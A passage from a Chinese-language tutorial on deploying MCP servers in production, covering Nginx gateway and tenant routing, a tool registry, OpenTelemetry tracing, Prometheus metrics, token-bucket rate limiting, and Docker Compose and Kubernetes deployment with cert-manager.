proxy_set_header X-MCP-Tool-Category "integrations";
proxy_set_header Connection "";
proxy_read_timeout 180s;
proxy_send_timeout 180s;
}
# 工具发现端点:聚合所有后端的工具列表
location /mcp/discovery {
proxy_pass http://127.0.0.1:3000; # 工具注册中心
proxy_http_version 1.1;
proxy_set_header Host $host;
}
# 健康检查
location /health {
return 200 '{"status":"ok","gateway":"mcp-gateway"}\n';
add_header Content-Type application/json;
}
}
工具注册与发现模式
当有多个 MCP Server 后端时,客户端如何知道"有哪些工具可用"?答案是一个工具注册中心——一个轻量级的 HTTP 服务,聚合所有 MCP Server 的工具列表:
# tool_registry.py — MCP 工具注册与发现中心
import httpx
import asyncio
from typing import Dict, List
class ToolRegistry:
"""聚合多个 MCP Server 的工具列表,提供统一的工具发现端点"""
# 注册的后端 MCP Server
BACKENDS = {
"filesystem": "http://127.0.0.1:3001",
"database": "http://127.0.0.1:3002",
"integrations": "http://127.0.0.1:3003",
}
def __init__(self):
self.tool_index: Dict[str, dict] = {} # tool_name → {backend, schema, ...}
self.client = httpx.AsyncClient(timeout=10.0)
async def refresh(self):
"""从所有后端拉取工具列表,构建聚合索引"""
self.tool_index = {}
for backend_name, backend_url in self.BACKENDS.items():
try:
# 调用每个后端的 tools/list 端点
resp = await self.client.post(
f"{backend_url}/mcp",
json={
"jsonrpc": "2.0",
"id": 1,
"method": "tools/list",
"params": {}
}
)
data = resp.json()
tools = data.get("result", {}).get("tools", [])
for tool in tools:
tool["_backend"] = backend_name
tool["_backend_url"] = backend_url
self.tool_index[tool["name"]] = tool
except Exception as e:
print(f"[REGISTRY] 后端 {backend_name} 不可达: {e}")
def get_tool_backend(self, tool_name: str) -> str | None:
"""根据工具名称查找对应的后端 URL"""
tool = self.tool_index.get(tool_name)
return tool["_backend_url"] if tool else None
def list_all_tools(self) -> List[dict]:
"""返回所有已注册的工具列表"""
return list(self.tool_index.values())
工具发现的流程:
- 启动时:ToolRegistry 向所有后端发送
tools/list请求,构建聚合工具索引 - 客户端请求工具列表:网关的
/mcp/discovery端点返回聚合后的所有工具 - 工具调用路由:客户端调用某个工具时,网关根据工具名称查找注册中心,将请求转发到对应的后端 Server
- 定期刷新:每 60 秒重新拉取一次工具列表,确保新增/下线的工具能实时反映
租户感知路由
在多租户场景下,不同租户的请求需要路由到独立的后端实例,确保数据和资源隔离。这通过在请求头中传递租户标识来实现:
# 在 Nginx 网关中根据租户头路由到不同的后端
map $http_x_tenant_id $tenant_backend {
"tenant-a" "mcp_tenant_a";
"tenant-b" "mcp_tenant_b";
default "mcp_default";
}
upstream mcp_tenant_a {
server 127.0.0.1:3101;
keepalive 16;
}
upstream mcp_tenant_b {
server 127.0.0.1:3102;
keepalive 16;
}
server {
listen 443 ssl http2;
server_name mcp-gateway.example.com;
location /mcp {
proxy_pass http://$tenant_backend;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Tenant-ID $http_x_tenant_id; # 透传租户 ID 给后端
proxy_set_header Connection "";
proxy_read_timeout 300s;
}
}
客户端在请求头中携带 X-Tenant-ID: tenant-a,Nginx 根据这个头将请求路由到对应的后端 Server。每个租户有独立的 MCP Server 实例、独立的 Docker 沙箱资源池、独立的数据库连接。
Higress:阿里开源的 API 网关,天然适合 MCP
如果你的团队已经在阿里云生态中,Higress(阿里云开源的 API 网关)是一个值得关注的 MCP 网关方案。它基于 Envoy 构建,原生支持:
- WASM 插件扩展——可以用多种语言编写自定义路由和认证逻辑
- AI 网关能力——内置对 AI API 的流量管理、模型路由和 Token 计费
- MCP 协议适配——Higress 社区已经提供了 MCP 协议转换插件,可以将标准 HTTP 请求转换为 MCP JSON-RPC 调用
对于需要高性能、可编程路由的生产级 MCP 网关,Higress 是 Nginx 之外的一个有力选择。
如果对 Agent 框架和多 Agent 协作还需要更多背景,建议阅读:
6. 监控、日志与可观测性
看不见的 MCP Server 就是不可靠的 MCP Server
安全加固、网关路由之后,第三个生产必备能力是可观测性——你必须知道:
- 现在有多少个客户端连接着?
- 哪些工具被调得最多?哪些从不被调用?
- 工具调用的平均响应时间是多少?有没有突然变慢?
- 今天有多少次认证失败?是不是有人在暴力猜测 API Key?
- Server 进程的内存占用是否在持续增长(内存泄漏)?
没有这些数据,MCP Server 就是一个黑盒——出了事只能靠用户投诉才知道。这一章构建 MCP Server 的可观测性三件套:链路追踪、结构化日志和指标监控。
OpenTelemetry JSON-RPC 链路追踪
MCP 协议基于 JSON-RPC 2.0,每个工具调用都是一次 RPC 调用。OpenTelemetry 是云原生可观测性的标准,我们可以编写一个中间件来自动为每个 JSON-RPC 请求创建 Span:
# otel_middleware.py — OpenTelemetry JSON-RPC 追踪中间件
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.trace import Status, StatusCode
import time
import functools
# 初始化 OpenTelemetry(生产环境中配置从环境变量读取)
trace.set_tracer_provider(TracerProvider())
otlp_exporter = OTLPSpanExporter(
endpoint="http://localhost:4317", # OTLP Collector 地址
insecure=True,
)
trace.get_tracer_provider().add_span_processor(
BatchSpanProcessor(otlp_exporter)
)
tracer = trace.get_tracer("mcp-server", "1.0.0")
def trace_jsonrpc(method: str):
"""JSON-RPC 方法追踪装饰器
为每个 MCP JSON-RPC 方法调用创建 OpenTelemetry Span,
自动记录调用参数、执行时间、异常信息。
用法:
@trace_jsonrpc("tools/call")
async def handle_tool_call(request_id, params):
...
"""
def decorator(func):
@functools.wraps(func)
async def wrapper(request_id, params, *args, **kwargs):
span_name = f"mcp.{method}"
with tracer.start_as_current_span(
span_name,
kind=trace.SpanKind.SERVER,
attributes={
SpanAttributes.RPC_SYSTEM: "jsonrpc",
SpanAttributes.RPC_METHOD: method,
SpanAttributes.RPC_JSONRPC_REQUEST_ID: str(request_id),
"mcp.tool.name": params.get("name", "unknown"),
}
) as span:
start_time = time.time()
try:
result = await func(request_id, params, *args, **kwargs)
duration_ms = (time.time() - start_time) * 1000
# 记录成功指标
span.set_attribute("mcp.duration_ms", duration_ms)
span.set_attribute("mcp.status", "success")
span.set_status(Status(StatusCode.OK))
return result
except Exception as e:
duration_ms = (time.time() - start_time) * 1000
# 记录异常信息
span.set_attribute("mcp.duration_ms", duration_ms)
span.set_attribute("mcp.status", "error")
span.set_attribute("mcp.error.type", type(e).__name__)
span.set_attribute("mcp.error.message", str(e)[:500])
span.set_status(Status(StatusCode.ERROR, str(e)))
span.record_exception(e)
raise
return wrapper
return decorator
# ========== 使用示例 ==========
@trace_jsonrpc("tools/call")
async def handle_tool_call(request_id: str, params: dict):
"""MCP tools/call 处理函数——自动追踪每次工具调用"""
tool_name = params.get("name")
tool_args = params.get("arguments", {})
# 实际的工具执行逻辑...
result = await execute_tool(tool_name, tool_args)
return {
"jsonrpc": "2.0",
"id": request_id,
"result": {
"content": [{"type": "text", "text": str(result)}]
}
}
这个中间件的核心价值:
- 自动 Span 创建:每次 JSON-RPC 调用自动生成带有完整元数据的 Span
- 异常自动记录:抛出的任何异常都会被捕获、记录到 Span,并标注错误类型
- 性能数据:每次调用的耗时(毫秒)自动记录,在 Jaeger/Grafana Tempo 中可以直接看到调用链的延迟分布
结构化日志
MCP Server 的日志必须是结构化的——纯文本日志在排查问题时效率极低。使用 JSON 格式输出每一条日志:
# structured_logging.py — MCP Server 结构化日志配置
import json
import logging
import sys
from datetime import datetime, timezone
class MCPJsonFormatter(logging.Formatter):
"""输出 JSON 格式的结构化日志,便于日志聚合系统解析和检索"""
def format(self, record: logging.LogRecord) -> str:
log_entry = {
"timestamp": datetime.now(timezone.utc).isoformat(),
"level": record.levelname,
"logger": record.name,
"message": record.getMessage(),
"module": record.module,
"function": record.funcName,
"line": record.lineno,
}
# 注入额外上下文字段(如有)
extra_fields = getattr(record, "extra_fields", {})
log_entry.update(extra_fields)
# 包含异常信息
if record.exc_info:
log_entry["exception"] = self.formatException(record.exc_info)
return json.dumps(log_entry, ensure_ascii=False)
def get_mcp_logger(name: str) -> logging.Logger:
"""获取配置了 JSON 格式的 MCP Logger
用法:
logger = get_mcp_logger("mcp.tool.filesystem")
logger.info("工具调用完成", extra={
"extra_fields": {
"tool": "search_files",
"user": "user-123",
"duration_ms": 42,
"sandbox_id": "abc12345"
}
})
"""
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
logger.propagate = False # 不传播到 root logger,避免重复输出
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(MCPJsonFormatter())
# 确保没有已存在的 handler
if not logger.handlers:
logger.addHandler(handler)
return logger
一条典型的 MCP 工具调用日志长这样:
{
"timestamp": "2026-05-17T10:32:15.421Z",
"level": "INFO",
"logger": "mcp.tool.filesystem",
"message": "工具调用完成",
"module": "filesystem_server",
"function": "handle_tool_call",
"line": 87,
"tool": "search_files",
"user": "user-123",
"duration_ms": 42,
"sandbox_id": "abc12345",
"exit_code": 0
}
结构化日志的好处:在 ELK、Loki 或阿里云 SLS 中,你可以直接按 tool、user、duration_ms 等字段过滤和聚合,而不需要用正则去 parse 日志文本。
健康检查端点
生产环境中,Kubernetes 或负载均衡器需要定期探测 MCP Server 是否健康。一个合适的健康检查端点不能只返回 200 OK——它应该验证关键依赖是否正常:
# health_check.py — MCP Server 健康检查端点(Kubernetes probes 适用)
from starlette.responses import JSONResponse
import asyncio
import time
# 全局状态
_server_start_time = time.time()
async def health_check(request):
"""深度健康检查
检查项:
1. MCP Server 进程是否运行(基本)
2. 工具注册中心是否可达(依赖服务)
3. 沙箱 Docker 引擎是否正常(运行时依赖)
"""
checks = {
"server": "ok",
"uptime_seconds": int(time.time() - _server_start_time),
}
# 检查工具注册中心
try:
import httpx
async with httpx.AsyncClient(timeout=3.0) as client:
resp = await client.get("http://127.0.0.1:3000/health")
checks["tool_registry"] = "ok" if resp.status_code == 200 else "degraded"
except Exception:
checks["tool_registry"] = "unreachable"
# 检查 Docker 沙箱引擎
try:
import subprocess
result = subprocess.run(
["docker", "info", "--format", "{{.ServerVersion}}"],
capture_output=True, text=True, timeout=5
)
checks["docker_engine"] = "ok" if result.returncode == 0 else "error"
except Exception:
checks["docker_engine"] = "unavailable"
# 判定总体健康状态
all_ok = all(v == "ok" for v in checks.values() if v != "ok")
overall = "healthy" if not any(
v in ("unreachable", "unavailable", "error")
for v in checks.values()
) else "degraded"
status_code = 200 if overall == "healthy" else 503
return JSONResponse(
{
"status": overall,
"checks": checks,
"timestamp": int(time.time()),
},
status_code=status_code,
)
Kubernetes 配置中使用这个端点:
# k8s-deployment.yaml 片段 — MCP Server 的存活和就绪探针
livenessProbe:
httpGet:
path: /health
port: 3000
initialDelaySeconds: 30
periodSeconds: 15
failureThreshold: 3
readinessProbe:
httpGet:
path: /health
port: 3000
initialDelaySeconds: 10
periodSeconds: 10
failureThreshold: 2
Prometheus 指标与告警
追踪和日志帮助你事后排查问题,指标和告警则帮你事前发现问题。以下是 MCP Server 需要暴露的核心 Prometheus 指标:
# metrics.py — MCP Server Prometheus 指标
from prometheus_client import Counter, Histogram, Gauge, generate_latest
import time
import functools
# === 指标定义 ===
# 工具调用计数器(按工具名称和状态分标签)
tool_calls_total = Counter(
"mcp_tool_calls_total",
"工具调用总次数",
["tool_name", "status"] # status: success | error | timeout | permission_denied
)
# 工具调用耗时分布
tool_call_duration_seconds = Histogram(
"mcp_tool_call_duration_seconds",
"工具调用耗时(秒)",
["tool_name"],
buckets=[0.01, 0.05, 0.1, 0.5, 1.0, 2.0, 5.0, 10.0, 30.0, 60.0]
)
# 认证失败计数器
auth_failures_total = Counter(
"mcp_auth_failures_total",
"认证失败总次数",
["reason"] # reason: expired_token | invalid_token | missing_token
)
# 活跃连接数
active_connections = Gauge(
"mcp_active_connections",
"当前活跃的客户端连接数"
)
# 沙箱容器运行数
sandbox_containers_running = Gauge(
"mcp_sandbox_containers_running",
"当前正在执行的沙箱容器数"
)
# 工具调用速率(滚动窗口)
tool_call_rate = Gauge(
"mcp_tool_call_rate_per_minute",
"每分钟工具调用速率",
["tool_name"]
)
# === 便捷记录函数 ===
def record_tool_call(tool_name: str):
"""装饰器/上下文管理器——自动记录工具调用的指标"""
def decorator(func):
@functools.wraps(func)
async def wrapper(*args, **kwargs):
start = time.time()
try:
result = await func(*args, **kwargs)
duration = time.time() - start
tool_calls_total.labels(tool_name=tool_name, status="success").inc()
tool_call_duration_seconds.labels(tool_name=tool_name).observe(duration)
return result
except PermissionDeniedError:
tool_calls_total.labels(tool_name=tool_name, status="permission_denied").inc()
raise
except Exception:
duration = time.time() - start
tool_calls_total.labels(tool_name=tool_name, status="error").inc()
tool_call_duration_seconds.labels(tool_name=tool_name).observe(duration)
raise
return wrapper
return decorator
# 暴露 Prometheus /metrics 端点
async def metrics_endpoint(request):
"""Prometheus 指标抓取端点"""
return PlainTextResponse(
generate_latest(),
media_type="text/plain; version=0.0.4"
)
告警阈值建议
基于上述指标,以下告警规则应该在生产环境中配置:
| 告警名称 | PromQL 条件 | 严重级别 | 处理建议 |
|---|---|---|---|
| 工具调用错误率过高 | rate(mcp_tool_calls_total{status="error"}[5m]) / rate(mcp_tool_calls_total[5m]) > 0.05 |
P1(严重) | 检查最近部署变更、后端依赖可用性 |
| 工具调用延迟突增 | histogram_quantile(0.95, rate(mcp_tool_call_duration_seconds_bucket[5m])) > 10 |
P2(警告) | 检查后端服务响应时间、沙箱资源是否充足 |
| 认证失败率激增 | rate(mcp_auth_failures_total[5m]) > 10 |
P1(严重) | 可能被攻击——检查客户端 IP 分布和失败原因 |
| 沙箱容器数异常 | mcp_sandbox_containers_running > 50 |
P2(警告) | 可能有僵尸容器未正常清理,检查 Docker 进程 |
| 活跃连接数异常 | mcp_active_connections > 1000 |
P2(警告) | 检查是否有连接泄漏或异常流量 |
这些告警规则可以直接导入 Prometheus Alertmanager 或 Grafana Alerting,也可以集成到企业微信、钉钉、飞书等通知渠道。
可观测性是生产环境的最后一道防线——它不阻止问题发生,但它确保你在问题发生时第一时间知道,并有足够的数据去定位根因。与认证授权(防线一)、沙箱隔离(防线二)一起,构成 MCP Server 生产部署的三层防护。
7. 限流与防滥用
没有限流的 MCP Server 是一次 DDoS 的邀请函
认证和授权回答了"谁可以调"和"能调什么"。但即使是一个合法的用户,也可能——有意或无意地——发起大量工具调用,耗尽服务器资源。
在 MCP 场景中,限流面临三个独特的挑战:
- LLM 的"工具狂躁":AI Agent 在推理循环中可能连续发起 10-30 次工具调用,如果每次调用都要启动 Docker 容器,资源消耗是指数级的。
- 流式响应的长连接:Streamable HTTP 的 SSE 连接可能持续数分钟,传统的"每秒请求数"限流模型不完全适用。
- 多客户端共享 Server:单个 MCP Server 实例服务多个客户端,一个客户端的滥用不能影响其他客户端。
解决方案:令牌桶(Token Bucket)限流 + 按客户端隔离的配额管理。
令牌桶限流中间件(TypeScript)
令牌桶算法是生产环境中最常用的限流策略——以固定速率向桶中放入令牌,每个请求消耗一个令牌,令牌耗尽时拒绝请求。它天然支持突发流量(桶里存了多少令牌就可以突发多少请求),比固定窗口计数器更平滑。
// rate-limiter.ts — MCP Server 令牌桶限流中间件
// 独立于认证层,可叠加使用
interface TokenBucket {
tokens: number; // 当前可用令牌数
lastRefill: number; // 上次填充时间戳(ms)
capacity: number; // 桶容量(最大令牌数)
refillRate: number; // 令牌填充速率(个/秒)
}
class RateLimiter {
private buckets: Map<string, TokenBucket> = new Map();
constructor(
private defaultCapacity: number = 60, // 默认 60 个令牌(相当于 60 次突发调用)
private defaultRefillRate: number = 10, // 默认每秒填充 10 个令牌
) {}
/**
* 为指定客户端创建或获取令牌桶
* @param clientId — 客户端标识(如 Mcp-Session-Id 或 user_id)
* @param config — 可选的客户端级容量和速率覆盖
*/
private getBucket(
clientId: string,
config?: { capacity?: number; refillRate?: number }
): TokenBucket {
if (!this.buckets.has(clientId)) {
this.buckets.set(clientId, {
tokens: config?.capacity ?? this.defaultCapacity,
lastRefill: Date.now(),
capacity: config?.capacity ?? this.defaultCapacity,
refillRate: config?.refillRate ?? this.defaultRefillRate,
});
}
return this.buckets.get(clientId)!;
}
/**
* 尝试消耗一个令牌
* @returns { allowed: boolean, retryAfter?: number } — 是否允许 + 重试等待秒数
*/
tryConsume(
clientId: string,
config?: { capacity?: number; refillRate?: number }
): { allowed: boolean; retryAfter?: number; remaining: number } {
const bucket = this.getBucket(clientId, config);
const now = Date.now();
// 计算自上次填充以来应该添加的令牌数
const elapsed = (now - bucket.lastRefill) / 1000; // 秒
const tokensToAdd = elapsed * bucket.refillRate;
bucket.tokens = Math.min(bucket.capacity, bucket.tokens + tokensToAdd);
bucket.lastRefill = now;
if (bucket.tokens >= 1) {
bucket.tokens -= 1;
return { allowed: true, remaining: Math.floor(bucket.tokens) };
}
// 计算下次有令牌可用的等待时间(秒)
const waitSeconds = Math.ceil((1 - bucket.tokens) / bucket.refillRate);
return { allowed: false, retryAfter: waitSeconds, remaining: 0 };
}
/** 清理超过 10 分钟未活动的桶,防止内存泄漏 */
cleanup(maxAgeMs: number = 600_000): void {
const now = Date.now();
for (const [clientId, bucket] of this.buckets) {
if (now - bucket.lastRefill > maxAgeMs) {
this.buckets.delete(clientId);
}
}
}
}
// 全局单例
export const rateLimiter = new RateLimiter();
// 每 60 秒清理一次过期桶
setInterval(() => rateLimiter.cleanup(), 60_000);
这个令牌桶实现的核心设计选择:
- 懒填充(Lazy Refill):不在定时器中填充令牌,而是在每次请求时计算应该补多少——简单且无需后台线程。
- 客户端隔离:每个客户端独立的令牌桶,一个用户的突发调用不影响其他用户。
- 可覆盖配置:不同客户端可以有不同的容量和速率——VIP 用户给更高配额。
- 自动清理:10 分钟无活动的桶自动清理,防止无限增长。
在 MCP HTTP Server 中集成限流
将限流器嵌入到 Express 中间件中,在认证之后、工具执行之前检查配额:
// mcp-middleware.ts — 集成限流到 MCP HTTP Server
import express from "express";
import { rateLimiter } from "./rate-limiter";
const app = express();
// 第 1 层:认证中间件(验证 Bearer Token,提取 user_id)
app.use("/mcp", authMiddleware);
// 第 2 层:限流中间件(按客户端检查配额)
app.use("/mcp", (req, res, next) => {
// 从认证中间件注入的 user_id 或从 Mcp-Session-Id 头获取
const clientId = req.headers["mcp-session-id"] as string
|| (req as any).userId
|| req.ip;
const result = rateLimiter.tryConsume(clientId);
// 记录限流指标(接入 Prometheus)
if (!result.allowed) {
mcp_rate_limited_total.labels(clientId).inc();
}
// 设置响应头——让客户端知道当前配额状态
res.setHeader("X-RateLimit-Remaining", String(result.remaining));
res.setHeader("X-RateLimit-Limit", "60");
if (!result.allowed) {
res.setHeader("Retry-After", String(result.retryAfter));
return res.status(429).json({
jsonrpc: "2.0",
error: {
code: -32000,
message: "请求过于频繁,请稍后重试",
data: {
retryAfter: result.retryAfter,
clientId: clientId,
}
},
id: null,
});
}
next();
});
// 第 3 层:MCP 工具调用处理
app.post("/mcp", mcpHandler);
工具执行配额:不是每个工具都一样贵
全局的"每分钟 N 次请求"限流粒度太粗——一次 query_metrics(几毫秒的内存查询)和一次 deploy_service(触发 CI/CD,可能耗时 10 分钟)的代价天差地别。我们需要按工具区分配额权重。
工具权重表:
| 工具类别 | 权重 | 最大并发 | 示例工具 |
|---|---|---|---|
| 轻量查询 | 1x | 50 | query_metrics、read_logs、search_files |
| 中等操作 | 3x | 20 | run_migration、update_config、send_notification |
| 重量操作 | 10x | 5 | deploy_service、provision_cluster、run_benchmark |
| 危险操作 | 全局互斥 | 1 | delete_cluster、reset_database、revoke_access |
实现工具权重限流:
// tool-quota.ts — 工具权重配额管理
const TOOL_WEIGHTS: Record<string, number> = {
query_metrics: 1,
read_logs: 1,
search_files: 1,
run_migration: 3,
update_config: 3,
deploy_service: 10,
provision_cluster: 10,
};
// 全局并发工具执行计数器
let activeConcurrentCalls = 0;
const MAX_CONCURRENT_CALLS = 50;
function checkToolQuota(toolName: string, userId: string): { allowed: boolean; reason?: string } {
const weight = TOOL_WEIGHTS[toolName] || 1;
// 并发数检查
if (activeConcurrentCalls + weight > MAX_CONCURRENT_CALLS) {
return {
allowed: false,
reason: `服务器繁忙:当前活跃调用 ${activeConcurrentCalls},工具权重 ${weight},超出上限 ${MAX_CONCURRENT_CALLS}`
};
}
// 危险操作全局互斥锁
if (weight >= 10) {
// 检查是否已有其他重量操作正在执行
// (生产环境中使用 Redis 分布式锁)
}
return { allowed: true };
}
DoS 防护策略总览
| 防护层 | 策略 | 实现方式 | 防护目标 |
|---|---|---|---|
| 网络层 | IP 级别限流 + 连接数限制 | Nginx limit_req_zone + limit_conn |
SYN flood、IP 级别滥用 |
| 应用层 | 令牌桶按客户端限流 | 自定义中间件(本节代码) | 单客户端高频调用、恶意遍历工具 |
| 工具层 | 权重配额 + 并发上限 | checkToolQuota() 前置检查 |
重量工具耗尽资源、危险操作冲突 |
| 沙箱层 | CPU/内存硬限制 + 超时强杀 | Docker cgroups + timeout_seconds |
单次工具执行资源爆炸 |
| 监控层 | 限流命中计数 + 异常告警 | Prometheus mcp_rate_limited_total 指标 |
及时发现攻击模式、调整限流参数 |
限流不是"尽可能严格"——太严影响正常用户体验,太松失去保护意义。建议从宽松参数开始(如 60 令牌/桶、10 令牌/秒填充),根据 Prometheus 指标逐步收紧。
8. 生产环境部署清单
从代码到生产:一份完整的部署地图
前面七章覆盖了 MCP Server 的安全加固、架构设计和可观测性。这一章把它们串起来——当你准备好上线时,需要做什么、按什么顺序做。
以下清单按部署阶段的先后顺序排列。每一项都标注了优先级(P0 = 不做不能上线、P1 = 强烈建议、P2 = 上线后逐步完善):
- P0:传输层加固 — 切换到 Streamable HTTP + TLS 终结(见第 2 章)
- P0:认证与授权 — OAuth 2.1 Bearer Token + 工具级 RBAC(见第 3 章)
- P0:工具沙箱 — Docker 容器隔离 + 网络限制(见第 4 章)
- P1:多服务网关 — Nginx 反向代理 + 工具路由(见第 5 章)
- P1:可观测性 — OpenTelemetry 追踪 + 结构化日志 + Prometheus 指标(见第 6 章)
- P1:限流防滥用 — 令牌桶 + 工具配额权重(见第 7 章)
- P2:容器化部署 — Docker Compose / Kubernetes(本章)
- P2:CI/CD 流水线 — 自动化构建、测试、发布(本章)
- P2:密钥管理 — 环境变量 → Vault 升级路径(本章)
- P2:滚动更新与回滚 — 零停机部署策略(本章)
Docker Compose 部署:从单进程到容器化
最小的生产级部署——一个 docker-compose.yml 搞定 MCP Server + Nginx 网关 + Prometheus 监控:
# docker-compose.yml — MCP 生产环境单机部署
version: "3.9"
services:
# === MCP Server 核心服务 ===
mcp-server:
build:
context: .
dockerfile: Dockerfile
container_name: mcp-server
restart: unless-stopped
ports:
- "127.0.0.1:3000:3000" # 仅监听 localhost,由 Nginx 代理
environment:
- MCP_TRANSPORT=http
- MCP_PORT=3000
- JWT_SECRET=${JWT_SECRET} # 从 .env 文件注入
- JWT_ISSUER=https://auth.example.com
- OTEL_EXPORTER_OTLP_ENDPOINT=http://jaeger:4317
- DOCKER_HOST=unix:///var/run/docker.sock # 沙箱需要 Docker socket
volumes:
- /var/run/docker.sock:/var/run/docker.sock # 允许启动沙箱容器
- mcp-logs:/var/log/mcp
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:3000/health"]
interval: 15s
timeout: 5s
retries: 3
deploy:
resources:
limits:
cpus: "2"
memory: "512M"
# === Nginx 反向代理(TLS 终结 + 限流) ===
nginx:
image: nginx:1.25-alpine
container_name: mcp-nginx
restart: unless-stopped
ports:
- "443:443"
volumes:
- ./nginx.conf:/etc/nginx/nginx.conf:ro
- ./certs:/etc/ssl/certs:ro # TLS 证书(挂载只读)
- nginx-logs:/var/log/nginx
depends_on:
- mcp-server
healthcheck:
test: ["CMD", "nginx", "-t"]
interval: 30s
timeout: 5s
retries: 3
# === Prometheus 指标采集 ===
prometheus:
image: prom/prometheus:v2.48.0
container_name: mcp-prometheus
restart: unless-stopped
ports:
- "127.0.0.1:9090:9090"
volumes:
- ./prometheus.yml:/etc/prometheus/prometheus.yml:ro
- prometheus-data:/prometheus
command:
- "--config.file=/etc/prometheus/prometheus.yml"
- "--storage.tsdb.retention.time=30d"
volumes:
mcp-logs:
nginx-logs:
prometheus-data:
配套的 .env 文件(不提交到 Git):
# .env — 生产环境变量(通过 Docker Compose 注入,不进入镜像)
JWT_SECRET=your-production-jwt-secret-min-32-chars
JWT_ISSUER=https://auth.example.com
MCP_TRANSPORT=http
MCP_PORT=3000
Kubernetes 部署:多副本 + 自动伸缩
Docker Compose 适合单机或小型部署。对于需要高可用、自动伸缩的生产环境,Kubernetes 是标准选择:
# k8s/deployment.yaml — MCP Server Kubernetes 部署
apiVersion: apps/v1
kind: Deployment
metadata:
name: mcp-server
namespace: mcp-production
labels:
app: mcp-server
spec:
replicas: 3 # 3 副本确保高可用
strategy:
type: RollingUpdate
rollingUpdate:
maxSurge: 1 # 滚动更新时最多多出 1 个 Pod
maxUnavailable: 0 # 滚动更新期间不允许不可用
selector:
matchLabels:
app: mcp-server
template:
metadata:
labels:
app: mcp-server
version: "1.0.0"
spec:
serviceAccountName: mcp-server-sa
containers:
- name: mcp-server
image: registry.example.com/mcp-server:1.0.0
imagePullPolicy: IfNotPresent
ports:
- containerPort: 3000
name: http
- containerPort: 9090
name: metrics
env:
- name: MCP_TRANSPORT
value: "http"
- name: MCP_PORT
value: "3000"
# 密钥从 Kubernetes Secret 注入
- name: JWT_SECRET
valueFrom:
secretKeyRef:
name: mcp-secrets
key: jwt-secret
- name: JWT_ISSUER
valueFrom:
secretKeyRef:
name: mcp-secrets
key: jwt-issuer
- name: OTEL_EXPORTER_OTLP_ENDPOINT
value: "http://otel-collector:4317"
resources:
requests:
cpu: "500m"
memory: "256Mi"
limits:
cpu: "2"
memory: "512Mi"
livenessProbe:
httpGet:
path: /health
port: 3000
initialDelaySeconds: 30
periodSeconds: 15
failureThreshold: 3
readinessProbe:
httpGet:
path: /health
port: 3000
initialDelaySeconds: 10
periodSeconds: 10
failureThreshold: 2
volumeMounts:
- name: docker-sock
mountPath: /var/run/docker.sock # 仅 Docker 沙箱模式需要
volumes:
- name: docker-sock
hostPath:
path: /var/run/docker.sock
---
# k8s/service.yaml — MCP Server Service
apiVersion: v1
kind: Service
metadata:
name: mcp-server
namespace: mcp-production
spec:
selector:
app: mcp-server
ports:
- name: http
port: 3000
targetPort: 3000
- name: metrics
port: 9090
targetPort: 9090
type: ClusterIP
---
# k8s/hpa.yaml — 水平自动伸缩
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
name: mcp-server-hpa
namespace: mcp-production
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: mcp-server
minReplicas: 3
maxReplicas: 10
metrics:
- type: Resource
resource:
name: cpu
target:
type: Utilization
averageUtilization: 70
- type: Resource
resource:
name: memory
target:
type: Utilization
averageUtilization: 80
密钥管理:从环境变量到 Vault 的演进路径
密钥管理的安全性是有梯度的:
| 阶段 | 方案 | 安全性 | 适用场景 |
|---|---|---|---|
| 🚫 硬编码 | 写在源码或配置文件里 | ❌ 密钥进 Git 历史——一旦泄露无法撤回 | 绝不能用于生产 |
| ⚠️ 环境变量 | export JWT_SECRET=xxx / Docker --env |
⚠️ 可通过 /proc/<pid>/environ 或容器 inspect 泄露 |
小型部署的起点(至少比硬编码好 100 倍) |
| ✅ K8s Secrets | Kubernetes Secret + RBAC 控制访问 | ✅ etcd 静态加密 + RBAC 权限控制 | K8s 集群的推荐方案 |
| ✅✅ Vault | HashiCorp Vault / 阿里云 KMS 动态密钥 | ✅✅ 动态密钥 + 自动轮换 + 审计日志 | 多集群、合规要求高的大型生产环境 |
建议路径:从 K8s Secrets 开始。对于绝大多数团队,Kubernetes Secret(配合 etcd 静态加密和严格的 RBAC)已经提供了足够的安全性。当团队规模扩展到多个集群、或者有密钥自动轮换和审计的合规需求时,再升级到 Vault。
TLS 证书自动化:cert-manager + Let's Encrypt
手动管理 TLS 证书在生产环境中是不可持续的——过期忘记续期就会导致服务中断。在 Kubernetes 中,cert-manager 可以全自动地从 Let's Encrypt 申请和续期证书:
# k8s/cert-manager.yaml — 自动化 TLS 证书管理
# 前提:已通过 Helm 安装 cert-manager
# helm install cert-manager jetstack/cert-manager
---
# ClusterIssuer:Let's Encrypt 生产环境签发方
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
name: letsencrypt-prod
spec:
acme:
server: https://acme-v02.api.letsencrypt.org/directory
email: [email protected] # 证书到期通知邮箱
privateKeySecretRef:
name: letsencrypt-prod-account-key
solvers:
- http01:
ingress:
class: nginx # 通过 Nginx Ingress 完成 HTTP-01 验证
---
# Certificate:为 MCP 网关域名申请证书
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: mcp-gateway-tls
namespace: mcp-production
spec:
secretName: mcp-gateway-tls-secret # 证书存储的 Secret 名称
issuerRef:
name: letsencrypt-prod
kind: ClusterIssuer
dnsNames:
- mcp-gateway.example.com
- mcp.example.com
# 证书到期前 30 天自动续期
renewBefore: 720h # 30 天
Nginx Ingress 引用这个自动管理的证书:
# k8s/ingress.yaml — MCP 网关 Ingress(TLS 终结在 Ingress 层)
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: mcp-gateway
namespace: mcp-production
annotations:
# cert-manager 自动管理的 TLS 证书
cert-manager.io/cluster-issuer: "letsencrypt-prod"
# Nginx 特定配置
nginx.ingress.kubernetes.io/proxy-read-timeout: "300"
nginx.ingress.kubernetes.io/proxy-send-timeout: "300"
nginx.ingress.kubernetes.io/proxy-body-size: "10m"
# 限流
nginx.ingress.kubernetes.io/limit-rps: "30"
nginx.ingress.kubernetes.io/limit-connections: "20"
spec:
tls:
- hosts:
- mcp-gateway.example.com
